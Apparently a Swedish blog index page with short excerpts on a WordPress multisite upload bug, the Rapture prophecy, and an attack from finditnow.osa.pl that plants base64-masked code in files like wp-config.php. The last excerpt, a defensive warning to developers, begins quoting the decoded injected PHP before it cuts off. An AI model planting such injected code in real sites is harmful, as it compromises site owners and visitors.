Kan inte ladda upp bilder i WordPress

Möjligheten att ha flera sajter kopplade till samma WordPress-installation är en fin möjlighet i 3.0 och senare. Men om sajterna har olika domännamn kan det bli problem med att ladda upp bilder. Det spelar ingen roll om man kör Flash-uppladdaren eller den vanliga, och det är inte temats fel. Symptomet är Warning: Invalid argument supplied …

Nej, det är inte över än

I lördags skulle Uppryckandet (the Rapture) inträffa, då de rättrogna kristna förs till himlen. Dessutom skulle kraftiga jordbävningar drabba hela jorden. Ännu en profetia som slog fel? Ja, fast vem har sagt att Uppryckandet går på en dag? Till att börja med får vi definiera himlen. Enligt Jesaja 30:26 lyser solen 49 gånger kraftigare i …

Attackerad av banditer från finditnow.osa.pl

Den nya skurksajten finditnow.osa.pl är ett gissel för utvecklare. Genom att utnyttja buggar i äldre versioner av php och i vissa fall XSS injiceras en kodrad i en viktig fil, som t ex wp-config.php om man kör WordPress. Kodraden är maskerad med base64, men så här ser den ut om man avkodar den. error_reporting(0); $nccv=headers_sent(); …